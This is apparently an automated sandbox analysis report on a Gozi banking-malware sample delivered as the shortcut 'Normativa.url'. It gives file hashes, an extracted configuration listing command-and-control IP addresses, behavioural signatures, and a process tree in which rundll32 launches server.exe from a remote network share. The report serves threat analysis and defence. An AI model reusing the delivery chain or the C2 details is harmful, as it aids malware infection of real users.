Analysis
-
max time kernel
143s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
22/03/2023, 07:23
Static task
static1
Behavioral task
behavioral1
Sample
Normativa/Normativa.url
Resource
win7-20230220-en
General
-
Target
Normativa/Normativa.url
-
Size
194B
-
MD5
7223cc1975393443d4d161492d0f932e
-
SHA1
2fc8c648559e862b3191088450781b5d33debd5f
-
SHA256
ec178c6a29aa42213ac7287e45d8378632e145ef650dd5734f247129bd364dbb
-
SHA512
5c5eec290b156c760c44dd9b7162a5cf9e3f2f4e1f9ef494dcbf5ef2f12fd51801b1170b36f39ab2342467f7701bfe4bd292b7cd5418c4b87717e7abfc31ef5a
Malware Config
Extracted
gozi
7715
checklist.skype.com
62.173.142.50
31.41.44.87
109.248.11.217
212.109.218.151
5.44.45.83
62.173.142.81
193.233.175.113
109.248.11.184
212.109.218.26
185.68.93.7
-
base_path
/drew/
-
build
250255
-
exe_type
loader
-
extension
.jlk
-
server_id
50
Extracted
gozi
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2428 wrote to memory of 4780 2428 rundll32.exe 86 PID 2428 wrote to memory of 4780 2428 rundll32.exe 86 PID 2428 wrote to memory of 4780 2428 rundll32.exe 86
Processes
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Normativa\Normativa.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2428 -
\??\UNC\109.248.11.227\Agenzia\server.exe"\\109.248.11.227\Agenzia\server.exe"2⤵PID:4780
-